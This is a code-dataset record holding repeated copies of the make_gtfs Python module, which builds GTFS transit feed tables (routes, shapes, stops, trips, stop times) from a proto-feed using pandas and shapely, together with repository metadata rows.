b = list(polys)[0].buffer(1.1*eps)
else:
b = list(polys)[-1].buffer(1.1*eps)
return b
def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):
"""
Given a GeoDataFrame of stops, a Shapely LineString in the
same coordinate system, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer in the distance units of that
coordinate system, do the following.
Return a GeoDataFrame of all the stops that lie within
``buffer`` distance units to the ``side`` of the LineString.
"""
b = buffer_side(linestring, side, buffer)
# Collect stops
return geo_stops.loc[geo_stops.intersects(b)].copy()
def build_stop_times(pfeed, routes, shapes, stops, trips, buffer=cs.BUFFER):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
shapes (DataFrame), stops (DataFrame), trips (DataFrame),
return DataFrame representing ``stop_times.txt``.
Includes the optional ``shape_dist_traveled`` column.
Don't make stop times for trips with no nearby stops.
"""
# Get the table of trips and add frequency and service window details
routes = (
routes
.filter(['route_id', 'route_short_name'])
.merge(pfeed.frequencies.drop(['shape_id'], axis=1))
)
trips = (
trips
.assign(service_window_id=lambda x: x.trip_id.map(
lambda y: y.split(cs.SEP)[2]))
.merge(routes)
)
# Get the geometries of ``shapes`` and not ``pfeed.shapes``
geometry_by_shape = dict(
gt.geometrize_shapes(shapes, use_utm=True)
.filter(['shape_id', 'geometry'])
.values
)
# Save on distance computations by memoizing
dist_by_stop_by_shape = {shape: {} for shape in geometry_by_shape}
def compute_stops_dists_times(geo_stops, linestring, shape,
start_time, end_time):
"""
Given a GeoDataFrame of stops on one side of a given Shapely
LineString with given shape ID, compute distances and departure
times of a trip traversing the LineString from start to end
at the given start and end times (in seconds past midnight)
and stopping at the stops encountered along the way.
Do not assume that the stops are ordered by trip encounter.
Return three lists of the same length: the stop IDs in order
that the trip encounters them, the shape distances traveled
along distances at the stops, and the times the stops are
encountered, respectively.
"""
g = geo_stops.copy()
dists_and_stops = []
for i, stop in enumerate(g['stop_id'].values):
if stop in dist_by_stop_by_shape[shape]:
d = dist_by_stop_by_shape[shape][stop]
else:
d = gt.get_segment_length(linestring,
g.geometry.iat[i])/1000 # km
dist_by_stop_by_shape[shape][stop] = d
dists_and_stops.append((d, stop))
dists, stops = zip(*sorted(dists_and_stops))
D = linestring.length/1000
dists_are_reasonable = all([d < D + 100 for d in dists])
if not dists_are_reasonable:
# Assume equal distances between stops :-(
n = len(stops)
delta = D/(n - 1)
dists = [i*delta for i in range(n)]
# Compute times using distances, start and end stop times,
# and linear interpolation
t0, t1 = start_time, end_time
d0, d1 = dists[0], dists[-1]
# Interpolate
times = np.interp(dists, [d0, d1], [t0, t1])
return stops, dists, times
# Iterate through trips and set stop times based on stop ID
# and service window frequency.
# Remember that every trip has a valid shape ID.
# Gather stops geographically from ``stops``.
rows = []
geo_stops = gt.geometrize_stops(stops, use_utm=True)
# Look on the side of the traffic side of street for this timezone
side = cs.traffic_by_timezone[pfeed.meta.agency_timezone.iat[0]]
for index, row in trips.iterrows():
shape = row['shape_id']
geom = geometry_by_shape[shape]
stops = get_nearby_stops(geo_stops, geom, side, buffer=buffer)
# Don't make stop times for trips without nearby stops
if stops.empty:
continue
length = geom.length/1000 # km
speed = row['speed'] # km/h
duration = int((length/speed)*3600) # seconds
frequency = row['frequency']
if not frequency:
# No stop times for this trip/frequency combo
continue
headway = 3600/frequency # seconds
trip = row['trip_id']
__, route, window, base_timestr, direction, i = (
trip.split(cs.SEP))
direction = int(direction)
base_time = gt.timestr_to_seconds(base_timestr)
start_time = base_time + headway*int(i)
end_time = start_time + duration
stops, dists, times = compute_stops_dists_times(stops, geom, shape,
start_time, end_time)
new_rows = [[trip, stop, j, time, time, dist]
for j, (stop, time, dist) in enumerate(zip(stops, times, dists))]
rows.extend(new_rows)
g = pd.DataFrame(rows, columns=['trip_id', 'stop_id', 'stop_sequence',
'arrival_time', 'departure_time', 'shape_dist_traveled'])
# Convert seconds back to time strings
g[['arrival_time', 'departure_time']] =\
g[['arrival_time', 'departure_time']].applymap(
lambda x: gt.timestr_to_seconds(x, inverse=True))
return g
def build_feed(pfeed, buffer=cs.BUFFER):
# Create Feed tables
agency = build_agency(pfeed)
calendar, service_by_window = build_calendar_etc(pfeed)
routes = build_routes(pfeed)
shapes = build_shapes(pfeed)
stops = build_stops(pfeed, shapes)
trips = build_trips(pfeed, routes, service_by_window)
stop_times = build_stop_times(pfeed, routes, shapes, stops, trips,
buffer=buffer)
# Be tidy and remove unused stops
stops = stops[stops.stop_id.isin(stop_times.stop_id)].copy()
# Create Feed
return gt.Feed(agency=agency, calendar=calendar, routes=routes,
shapes=shapes, stops=stops, stop_times=stop_times, trips=trips,
dist_units='km') |
mrcagney/make_gtfs | make_gtfs/main.py | buffer_side | python | def buffer_side(linestring, side, buffer):
b = linestring.buffer(buffer, cap_style=2)
if side in ['left', 'right'] and buffer > 0:
# Make a tiny buffer to split the normal-size buffer
# in half across the linestring
eps = min(buffer/2, 0.001)
b0 = linestring.buffer(eps, cap_style=3)
diff = b.difference(b0)
polys = so.polygonize(diff)
# Buffer sides slightly to include original linestring
if side == 'left':
b = list(polys)[0].buffer(1.1*eps)
else:
b = list(polys)[-1].buffer(1.1*eps)
return b | Given a Shapely LineString, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer size in the distance units of
the LineString, buffer the LineString on the given side by
the buffer size and return the resulting Shapely polygon. | train | https://github.com/mrcagney/make_gtfs/blob/37b6f88e03bac708c2e85d6f4b6d48a0c92e4a59/make_gtfs/main.py#L227-L250 | null | import pandas as pd
import numpy as np
import shapely.ops as so
import shapely.geometry as sg
import gtfstk as gt
from . import constants as cs
def get_duration(timestr1, timestr2, units='s'):
"""
Return the duration of the time period between the first and second
time string in the given units.
Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).
Assume ``timestr1 < timestr2``.
"""
valid_units = ['s', 'min', 'h']
assert units in valid_units,\
"Units must be one of {!s}".format(valid_units)
duration = (
gt.timestr_to_seconds(timestr2) - gt.timestr_to_seconds(timestr1)
)
if units == 's':
return duration
elif units == 'min':
return duration/60
else:
return duration/3600
def build_stop_ids(shape_id):
"""
Create a pair of stop IDs based on the given shape ID.
"""
return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]
def build_stop_names(shape_id):
"""
Create a pair of stop names based on the given shape ID.
"""
return ['Stop {!s} on shape {!s} '.format(i, shape_id)
for i in range(2)]
def build_agency(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``agency.txt``
"""
return pd.DataFrame({
'agency_name': pfeed.meta['agency_name'].iat[0],
'agency_url': pfeed.meta['agency_url'].iat[0],
'agency_timezone': pfeed.meta['agency_timezone'].iat[0],
}, index=[0])
def build_calendar_etc(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``calendar.txt``
and a dictionary of the form <service window ID> -> <service ID>,
respectively.
"""
windows = pfeed.service_windows.copy()
# Create a service ID for each distinct days_active field and map the
# service windows to those service IDs
def get_sid(bitlist):
return 'srv' + ''.join([str(b) for b in bitlist])
weekdays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
bitlists = set()
# Create a dictionary <service window ID> -> <service ID>
d = dict()
for index, window in windows.iterrows():
bitlist = window[weekdays].tolist()
d[window['service_window_id']] = get_sid(bitlist)
bitlists.add(tuple(bitlist))
service_by_window = d
# Create calendar
start_date = pfeed.meta['start_date'].iat[0]
end_date = pfeed.meta['end_date'].iat[0]
F = []
for bitlist in bitlists:
F.append([get_sid(bitlist)] + list(bitlist) +
[start_date, end_date])
calendar = pd.DataFrame(F, columns=(
['service_id'] + weekdays + ['start_date', 'end_date']))
return calendar, service_by_window
def build_routes(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``routes.txt``.
"""
f = pfeed.frequencies[['route_short_name', 'route_long_name',
'route_type', 'shape_id']].drop_duplicates().copy()
# Create route IDs
f['route_id'] = 'r' + f['route_short_name'].map(str)
del f['shape_id']
return f
def build_shapes(pfeed):
"""
Given a ProtoFeed, return DataFrame representing ``shapes.txt``.
Only use shape IDs that occur in both ``pfeed.shapes`` and
``pfeed.frequencies``.
Create reversed shapes where routes traverse shapes in both
directions.
"""
rows = []
for shape, geom in pfeed.shapes[['shape_id',
'geometry']].itertuples(index=False):
if shape not in pfeed.shapes_extra:
continue
if pfeed.shapes_extra[shape] == 2:
# Add shape and its reverse
shid = shape + '-1'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
shid = shape + '-0'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(reversed(geom.coords))]
rows.extend(new_rows)
else:
# Add shape
shid = '{}{}{}'.format(shape, cs.SEP, pfeed.shapes_extra[shape])
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
return pd.DataFrame(rows, columns=['shape_id', 'shape_pt_sequence',
'shape_pt_lon', 'shape_pt_lat'])
def build_stops(pfeed, shapes=None):
"""
Given a ProtoFeed, return a DataFrame representing ``stops.txt``.
If ``pfeed.stops`` is not ``None``, then return that.
Otherwise, require built shapes output by :func:`build_shapes`,
create one stop at the beginning (the first point) of each shape
and one at the end (the last point) of each shape,
and drop stops with duplicate coordinates.
Note that this will yield one stop for shapes that are loops.
"""
if pfeed.stops is not None:
stops = pfeed.stops.copy()
else:
if shapes is None:
raise ValueError('Must input shapes built by build_shapes()')
geo_shapes = gt.geometrize_shapes(shapes)
rows = []
for shape, geom in geo_shapes[['shape_id',
'geometry']].itertuples(index=False):
stop_ids = build_stop_ids(shape)
stop_names = build_stop_names(shape)
for i in range(2):
stop_id = stop_ids[i]
stop_name = stop_names[i]
stop_lon, stop_lat = geom.interpolate(i,
normalized=True).coords[0]
rows.append([stop_id, stop_name, stop_lon, stop_lat])
stops = (
pd.DataFrame(rows, columns=['stop_id', 'stop_name',
'stop_lon', 'stop_lat'])
.drop_duplicates(subset=['stop_lon', 'stop_lat'])
)
return stops
def build_trips(pfeed, routes, service_by_window):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
service-by-window (dictionary), return a DataFrame representing
``trips.txt``.
Trip IDs encode route, direction, and service window information
to make it easy to compute stop times later.
"""
# Put together the route and service data
routes = pd.merge(routes[['route_id', 'route_short_name']],
pfeed.frequencies)
routes = pd.merge(routes, pfeed.service_windows)
# For each row in routes, add trips at the specified frequency in
# the specified direction
rows = []
for index, row in routes.iterrows():
shape = row['shape_id']
route = row['route_id']
window = row['service_window_id']
start, end = row[['start_time', 'end_time']].values
duration = get_duration(start, end, 'h')
frequency = row['frequency']
if not frequency:
# No trips during this service window
continue
# Rounding down occurs here if the duration isn't integral
# (bad input)
num_trips_per_direction = int(frequency*duration)
service = service_by_window[window]
direction = row['direction']
if direction == 2:
directions = [0, 1]
else:
directions = [direction]
for direction in directions:
# Warning: this shape-ID-making logic needs to match that
# in ``build_shapes``
shid = '{}{}{}'.format(shape, cs.SEP, direction)
rows.extend([[
route,
cs.SEP.join(['t', route, window, start,
str(direction), str(i)]),
direction,
shid,
service
] for i in range(num_trips_per_direction)])
return pd.DataFrame(rows, columns=['route_id', 'trip_id', 'direction_id',
'shape_id', 'service_id'])
def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):
"""
Given a GeoDataFrame of stops, a Shapely LineString in the
same coordinate system, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer in the distance units of that
coordinate system, do the following.
Return a GeoDataFrame of all the stops that lie within
``buffer`` distance units to the ``side`` of the LineString.
"""
b = buffer_side(linestring, side, buffer)
# Collect stops
return geo_stops.loc[geo_stops.intersects(b)].copy()
def build_stop_times(pfeed, routes, shapes, stops, trips, buffer=cs.BUFFER):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
shapes (DataFrame), stops (DataFrame), trips (DataFrame),
return DataFrame representing ``stop_times.txt``.
Includes the optional ``shape_dist_traveled`` column.
Don't make stop times for trips with no nearby stops.
"""
# Get the table of trips and add frequency and service window details
routes = (
routes
.filter(['route_id', 'route_short_name'])
.merge(pfeed.frequencies.drop(['shape_id'], axis=1))
)
trips = (
trips
.assign(service_window_id=lambda x: x.trip_id.map(
lambda y: y.split(cs.SEP)[2]))
.merge(routes)
)
# Get the geometries of ``shapes`` and not ``pfeed.shapes``
geometry_by_shape = dict(
gt.geometrize_shapes(shapes, use_utm=True)
.filter(['shape_id', 'geometry'])
.values
)
# Save on distance computations by memoizing
dist_by_stop_by_shape = {shape: {} for shape in geometry_by_shape}
def compute_stops_dists_times(geo_stops, linestring, shape,
start_time, end_time):
"""
Given a GeoDataFrame of stops on one side of a given Shapely
LineString with given shape ID, compute distances and departure
times of a trip traversing the LineString from start to end
at the given start and end times (in seconds past midnight)
and stopping at the stops encountered along the way.
Do not assume that the stops are ordered by trip encounter.
Return three lists of the same length: the stop IDs in order
that the trip encounters them, the shape distances traveled
along distances at the stops, and the times the stops are
encountered, respectively.
"""
g = geo_stops.copy()
dists_and_stops = []
for i, stop in enumerate(g['stop_id'].values):
if stop in dist_by_stop_by_shape[shape]:
d = dist_by_stop_by_shape[shape][stop]
else:
d = gt.get_segment_length(linestring,
g.geometry.iat[i])/1000 # km
dist_by_stop_by_shape[shape][stop] = d
dists_and_stops.append((d, stop))
dists, stops = zip(*sorted(dists_and_stops))
D = linestring.length/1000
dists_are_reasonable = all([d < D + 100 for d in dists])
if not dists_are_reasonable:
# Assume equal distances between stops :-(
n = len(stops)
delta = D/(n - 1)
dists = [i*delta for i in range(n)]
# Compute times using distances, start and end stop times,
# and linear interpolation
t0, t1 = start_time, end_time
d0, d1 = dists[0], dists[-1]
# Interpolate
times = np.interp(dists, [d0, d1], [t0, t1])
return stops, dists, times
# Iterate through trips and set stop times based on stop ID
# and service window frequency.
# Remember that every trip has a valid shape ID.
# Gather stops geographically from ``stops``.
rows = []
geo_stops = gt.geometrize_stops(stops, use_utm=True)
# Look on the side of the traffic side of street for this timezone
side = cs.traffic_by_timezone[pfeed.meta.agency_timezone.iat[0]]
for index, row in trips.iterrows():
shape = row['shape_id']
geom = geometry_by_shape[shape]
stops = get_nearby_stops(geo_stops, geom, side, buffer=buffer)
# Don't make stop times for trips without nearby stops
if stops.empty:
continue
length = geom.length/1000 # km
speed = row['speed'] # km/h
duration = int((length/speed)*3600) # seconds
frequency = row['frequency']
if not frequency:
# No stop times for this trip/frequency combo
continue
headway = 3600/frequency # seconds
trip = row['trip_id']
__, route, window, base_timestr, direction, i = (
trip.split(cs.SEP))
direction = int(direction)
base_time = gt.timestr_to_seconds(base_timestr)
start_time = base_time + headway*int(i)
end_time = start_time + duration
stops, dists, times = compute_stops_dists_times(stops, geom, shape,
start_time, end_time)
new_rows = [[trip, stop, j, time, time, dist]
for j, (stop, time, dist) in enumerate(zip(stops, times, dists))]
rows.extend(new_rows)
g = pd.DataFrame(rows, columns=['trip_id', 'stop_id', 'stop_sequence',
'arrival_time', 'departure_time', 'shape_dist_traveled'])
# Convert seconds back to time strings
g[['arrival_time', 'departure_time']] =\
g[['arrival_time', 'departure_time']].applymap(
lambda x: gt.timestr_to_seconds(x, inverse=True))
return g
def build_feed(pfeed, buffer=cs.BUFFER):
# Create Feed tables
agency = build_agency(pfeed)
calendar, service_by_window = build_calendar_etc(pfeed)
routes = build_routes(pfeed)
shapes = build_shapes(pfeed)
stops = build_stops(pfeed, shapes)
trips = build_trips(pfeed, routes, service_by_window)
stop_times = build_stop_times(pfeed, routes, shapes, stops, trips,
buffer=buffer)
# Be tidy and remove unused stops
stops = stops[stops.stop_id.isin(stop_times.stop_id)].copy()
# Create Feed
return gt.Feed(agency=agency, calendar=calendar, routes=routes,
shapes=shapes, stops=stops, stop_times=stop_times, trips=trips,
dist_units='km') |
mrcagney/make_gtfs | make_gtfs/main.py | get_nearby_stops | python | def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):
b = buffer_side(linestring, side, buffer)
# Collect stops
return geo_stops.loc[geo_stops.intersects(b)].copy() | Given a GeoDataFrame of stops, a Shapely LineString in the
same coordinate system, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer in the distance units of that
coordinate system, do the following.
Return a GeoDataFrame of all the stops that lie within
``buffer`` distance units to the ``side`` of the LineString. | train | https://github.com/mrcagney/make_gtfs/blob/37b6f88e03bac708c2e85d6f4b6d48a0c92e4a59/make_gtfs/main.py#L252-L266 | [
"def buffer_side(linestring, side, buffer):\n \"\"\"\n Given a Shapely LineString, a side of the LineString\n (string; 'left' = left hand side of LineString,\n 'right' = right hand side of LineString, or\n 'both' = both sides), and a buffer size in the distance units of\n the LineString, buffer th... | import pandas as pd
import numpy as np
import shapely.ops as so
import shapely.geometry as sg
import gtfstk as gt
from . import constants as cs
def get_duration(timestr1, timestr2, units='s'):
"""
Return the duration of the time period between the first and second
time string in the given units.
Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).
Assume ``timestr1 < timestr2``.
"""
valid_units = ['s', 'min', 'h']
assert units in valid_units,\
"Units must be one of {!s}".format(valid_units)
duration = (
gt.timestr_to_seconds(timestr2) - gt.timestr_to_seconds(timestr1)
)
if units == 's':
return duration
elif units == 'min':
return duration/60
else:
return duration/3600
def build_stop_ids(shape_id):
"""
Create a pair of stop IDs based on the given shape ID.
"""
return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]
def build_stop_names(shape_id):
"""
Create a pair of stop names based on the given shape ID.
"""
return ['Stop {!s} on shape {!s} '.format(i, shape_id)
for i in range(2)]
def build_agency(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``agency.txt``
"""
return pd.DataFrame({
'agency_name': pfeed.meta['agency_name'].iat[0],
'agency_url': pfeed.meta['agency_url'].iat[0],
'agency_timezone': pfeed.meta['agency_timezone'].iat[0],
}, index=[0])
def build_calendar_etc(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``calendar.txt``
and a dictionary of the form <service window ID> -> <service ID>,
respectively.
"""
windows = pfeed.service_windows.copy()
# Create a service ID for each distinct days_active field and map the
# service windows to those service IDs
def get_sid(bitlist):
return 'srv' + ''.join([str(b) for b in bitlist])
weekdays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
bitlists = set()
# Create a dictionary <service window ID> -> <service ID>
d = dict()
for index, window in windows.iterrows():
bitlist = window[weekdays].tolist()
d[window['service_window_id']] = get_sid(bitlist)
bitlists.add(tuple(bitlist))
service_by_window = d
# Create calendar
start_date = pfeed.meta['start_date'].iat[0]
end_date = pfeed.meta['end_date'].iat[0]
F = []
for bitlist in bitlists:
F.append([get_sid(bitlist)] + list(bitlist) +
[start_date, end_date])
calendar = pd.DataFrame(F, columns=(
['service_id'] + weekdays + ['start_date', 'end_date']))
return calendar, service_by_window
def build_routes(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``routes.txt``.
"""
f = pfeed.frequencies[['route_short_name', 'route_long_name',
'route_type', 'shape_id']].drop_duplicates().copy()
# Create route IDs
f['route_id'] = 'r' + f['route_short_name'].map(str)
del f['shape_id']
return f
def build_shapes(pfeed):
"""
Given a ProtoFeed, return DataFrame representing ``shapes.txt``.
Only use shape IDs that occur in both ``pfeed.shapes`` and
``pfeed.frequencies``.
Create reversed shapes where routes traverse shapes in both
directions.
"""
rows = []
for shape, geom in pfeed.shapes[['shape_id',
'geometry']].itertuples(index=False):
if shape not in pfeed.shapes_extra:
continue
if pfeed.shapes_extra[shape] == 2:
# Add shape and its reverse
shid = shape + '-1'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
shid = shape + '-0'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(reversed(geom.coords))]
rows.extend(new_rows)
else:
# Add shape
shid = '{}{}{}'.format(shape, cs.SEP, pfeed.shapes_extra[shape])
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
return pd.DataFrame(rows, columns=['shape_id', 'shape_pt_sequence',
'shape_pt_lon', 'shape_pt_lat'])
def build_stops(pfeed, shapes=None):
"""
Given a ProtoFeed, return a DataFrame representing ``stops.txt``.
If ``pfeed.stops`` is not ``None``, then return that.
Otherwise, require built shapes output by :func:`build_shapes`,
create one stop at the beginning (the first point) of each shape
and one at the end (the last point) of each shape,
and drop stops with duplicate coordinates.
Note that this will yield one stop for shapes that are loops.
"""
if pfeed.stops is not None:
stops = pfeed.stops.copy()
else:
if shapes is None:
raise ValueError('Must input shapes built by build_shapes()')
geo_shapes = gt.geometrize_shapes(shapes)
rows = []
for shape, geom in geo_shapes[['shape_id',
'geometry']].itertuples(index=False):
stop_ids = build_stop_ids(shape)
stop_names = build_stop_names(shape)
for i in range(2):
stop_id = stop_ids[i]
stop_name = stop_names[i]
stop_lon, stop_lat = geom.interpolate(i,
normalized=True).coords[0]
rows.append([stop_id, stop_name, stop_lon, stop_lat])
stops = (
pd.DataFrame(rows, columns=['stop_id', 'stop_name',
'stop_lon', 'stop_lat'])
.drop_duplicates(subset=['stop_lon', 'stop_lat'])
)
return stops
def build_trips(pfeed, routes, service_by_window):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
service-by-window (dictionary), return a DataFrame representing
``trips.txt``.
Trip IDs encode route, direction, and service window information
to make it easy to compute stop times later.
"""
# Put together the route and service data
routes = pd.merge(routes[['route_id', 'route_short_name']],
pfeed.frequencies)
routes = pd.merge(routes, pfeed.service_windows)
# For each row in routes, add trips at the specified frequency in
# the specified direction
rows = []
for index, row in routes.iterrows():
shape = row['shape_id']
route = row['route_id']
window = row['service_window_id']
start, end = row[['start_time', 'end_time']].values
duration = get_duration(start, end, 'h')
frequency = row['frequency']
if not frequency:
# No trips during this service window
continue
# Rounding down occurs here if the duration isn't integral
# (bad input)
num_trips_per_direction = int(frequency*duration)
service = service_by_window[window]
direction = row['direction']
if direction == 2:
directions = [0, 1]
else:
directions = [direction]
for direction in directions:
# Warning: this shape-ID-making logic needs to match that
# in ``build_shapes``
shid = '{}{}{}'.format(shape, cs.SEP, direction)
rows.extend([[
route,
cs.SEP.join(['t', route, window, start,
str(direction), str(i)]),
direction,
shid,
service
] for i in range(num_trips_per_direction)])
return pd.DataFrame(rows, columns=['route_id', 'trip_id', 'direction_id',
'shape_id', 'service_id'])
def buffer_side(linestring, side, buffer):
"""
Given a Shapely LineString, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer size in the distance units of
the LineString, buffer the LineString on the given side by
the buffer size and return the resulting Shapely polygon.
"""
b = linestring.buffer(buffer, cap_style=2)
if side in ['left', 'right'] and buffer > 0:
# Make a tiny buffer to split the normal-size buffer
# in half across the linestring
eps = min(buffer/2, 0.001)
b0 = linestring.buffer(eps, cap_style=3)
diff = b.difference(b0)
polys = so.polygonize(diff)
# Buffer sides slightly to include original linestring
if side == 'left':
b = list(polys)[0].buffer(1.1*eps)
else:
b = list(polys)[-1].buffer(1.1*eps)
return b
def build_stop_times(pfeed, routes, shapes, stops, trips, buffer=cs.BUFFER):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
shapes (DataFrame), stops (DataFrame), trips (DataFrame),
return DataFrame representing ``stop_times.txt``.
Includes the optional ``shape_dist_traveled`` column.
Don't make stop times for trips with no nearby stops.
"""
# Get the table of trips and add frequency and service window details
routes = (
routes
.filter(['route_id', 'route_short_name'])
.merge(pfeed.frequencies.drop(['shape_id'], axis=1))
)
trips = (
trips
.assign(service_window_id=lambda x: x.trip_id.map(
lambda y: y.split(cs.SEP)[2]))
.merge(routes)
)
# Get the geometries of ``shapes`` and not ``pfeed.shapes``
geometry_by_shape = dict(
gt.geometrize_shapes(shapes, use_utm=True)
.filter(['shape_id', 'geometry'])
.values
)
# Save on distance computations by memoizing
dist_by_stop_by_shape = {shape: {} for shape in geometry_by_shape}
def compute_stops_dists_times(geo_stops, linestring, shape,
start_time, end_time):
"""
Given a GeoDataFrame of stops on one side of a given Shapely
LineString with given shape ID, compute distances and departure
times of a trip traversing the LineString from start to end
at the given start and end times (in seconds past midnight)
and stopping at the stops encountered along the way.
Do not assume that the stops are ordered by trip encounter.
Return three lists of the same length: the stop IDs in order
that the trip encounters them, the shape distances traveled
along distances at the stops, and the times the stops are
encountered, respectively.
"""
g = geo_stops.copy()
dists_and_stops = []
for i, stop in enumerate(g['stop_id'].values):
if stop in dist_by_stop_by_shape[shape]:
d = dist_by_stop_by_shape[shape][stop]
else:
d = gt.get_segment_length(linestring,
g.geometry.iat[i])/1000 # km
dist_by_stop_by_shape[shape][stop] = d
dists_and_stops.append((d, stop))
dists, stops = zip(*sorted(dists_and_stops))
D = linestring.length/1000
dists_are_reasonable = all([d < D + 100 for d in dists])
if not dists_are_reasonable:
# Assume equal distances between stops :-(
n = len(stops)
delta = D/(n - 1)
dists = [i*delta for i in range(n)]
# Compute times using distances, start and end stop times,
# and linear interpolation
t0, t1 = start_time, end_time
d0, d1 = dists[0], dists[-1]
# Interpolate
times = np.interp(dists, [d0, d1], [t0, t1])
return stops, dists, times
# Iterate through trips and set stop times based on stop ID
# and service window frequency.
# Remember that every trip has a valid shape ID.
# Gather stops geographically from ``stops``.
rows = []
geo_stops = gt.geometrize_stops(stops, use_utm=True)
# Look on the side of the traffic side of street for this timezone
side = cs.traffic_by_timezone[pfeed.meta.agency_timezone.iat[0]]
for index, row in trips.iterrows():
shape = row['shape_id']
geom = geometry_by_shape[shape]
stops = get_nearby_stops(geo_stops, geom, side, buffer=buffer)
# Don't make stop times for trips without nearby stops
if stops.empty:
continue
length = geom.length/1000 # km
speed = row['speed'] # km/h
duration = int((length/speed)*3600) # seconds
frequency = row['frequency']
if not frequency:
# No stop times for this trip/frequency combo
continue
headway = 3600/frequency # seconds
trip = row['trip_id']
__, route, window, base_timestr, direction, i = (
trip.split(cs.SEP))
direction = int(direction)
base_time = gt.timestr_to_seconds(base_timestr)
start_time = base_time + headway*int(i)
end_time = start_time + duration
stops, dists, times = compute_stops_dists_times(stops, geom, shape,
start_time, end_time)
new_rows = [[trip, stop, j, time, time, dist]
for j, (stop, time, dist) in enumerate(zip(stops, times, dists))]
rows.extend(new_rows)
g = pd.DataFrame(rows, columns=['trip_id', 'stop_id', 'stop_sequence',
'arrival_time', 'departure_time', 'shape_dist_traveled'])
# Convert seconds back to time strings
g[['arrival_time', 'departure_time']] =\
g[['arrival_time', 'departure_time']].applymap(
lambda x: gt.timestr_to_seconds(x, inverse=True))
return g
def build_feed(pfeed, buffer=cs.BUFFER):
# Create Feed tables
agency = build_agency(pfeed)
calendar, service_by_window = build_calendar_etc(pfeed)
routes = build_routes(pfeed)
shapes = build_shapes(pfeed)
stops = build_stops(pfeed, shapes)
trips = build_trips(pfeed, routes, service_by_window)
stop_times = build_stop_times(pfeed, routes, shapes, stops, trips,
buffer=buffer)
# Be tidy and remove unused stops
stops = stops[stops.stop_id.isin(stop_times.stop_id)].copy()
# Create Feed
return gt.Feed(agency=agency, calendar=calendar, routes=routes,
shapes=shapes, stops=stops, stop_times=stop_times, trips=trips,
dist_units='km') |
mrcagney/make_gtfs | make_gtfs/main.py | build_stop_times | python | def build_stop_times(pfeed, routes, shapes, stops, trips, buffer=cs.BUFFER):
# Get the table of trips and add frequency and service window details
routes = (
routes
.filter(['route_id', 'route_short_name'])
.merge(pfeed.frequencies.drop(['shape_id'], axis=1))
)
trips = (
trips
.assign(service_window_id=lambda x: x.trip_id.map(
lambda y: y.split(cs.SEP)[2]))
.merge(routes)
)
# Get the geometries of ``shapes`` and not ``pfeed.shapes``
geometry_by_shape = dict(
gt.geometrize_shapes(shapes, use_utm=True)
.filter(['shape_id', 'geometry'])
.values
)
# Save on distance computations by memoizing
dist_by_stop_by_shape = {shape: {} for shape in geometry_by_shape}
def compute_stops_dists_times(geo_stops, linestring, shape,
start_time, end_time):
"""
Given a GeoDataFrame of stops on one side of a given Shapely
LineString with given shape ID, compute distances and departure
times of a trip traversing the LineString from start to end
at the given start and end times (in seconds past midnight)
and stopping at the stops encountered along the way.
Do not assume that the stops are ordered by trip encounter.
Return three lists of the same length: the stop IDs in order
that the trip encounters them, the shape distances traveled
along distances at the stops, and the times the stops are
encountered, respectively.
"""
g = geo_stops.copy()
dists_and_stops = []
for i, stop in enumerate(g['stop_id'].values):
if stop in dist_by_stop_by_shape[shape]:
d = dist_by_stop_by_shape[shape][stop]
else:
d = gt.get_segment_length(linestring,
g.geometry.iat[i])/1000 # km
dist_by_stop_by_shape[shape][stop] = d
dists_and_stops.append((d, stop))
dists, stops = zip(*sorted(dists_and_stops))
D = linestring.length/1000
dists_are_reasonable = all([d < D + 100 for d in dists])
if not dists_are_reasonable:
# Assume equal distances between stops :-(
n = len(stops)
delta = D/(n - 1)
dists = [i*delta for i in range(n)]
# Compute times using distances, start and end stop times,
# and linear interpolation
t0, t1 = start_time, end_time
d0, d1 = dists[0], dists[-1]
# Interpolate
times = np.interp(dists, [d0, d1], [t0, t1])
return stops, dists, times
# Iterate through trips and set stop times based on stop ID
# and service window frequency.
# Remember that every trip has a valid shape ID.
# Gather stops geographically from ``stops``.
rows = []
geo_stops = gt.geometrize_stops(stops, use_utm=True)
# Look on the side of the traffic side of street for this timezone
side = cs.traffic_by_timezone[pfeed.meta.agency_timezone.iat[0]]
for index, row in trips.iterrows():
shape = row['shape_id']
geom = geometry_by_shape[shape]
stops = get_nearby_stops(geo_stops, geom, side, buffer=buffer)
# Don't make stop times for trips without nearby stops
if stops.empty:
continue
length = geom.length/1000 # km
speed = row['speed'] # km/h
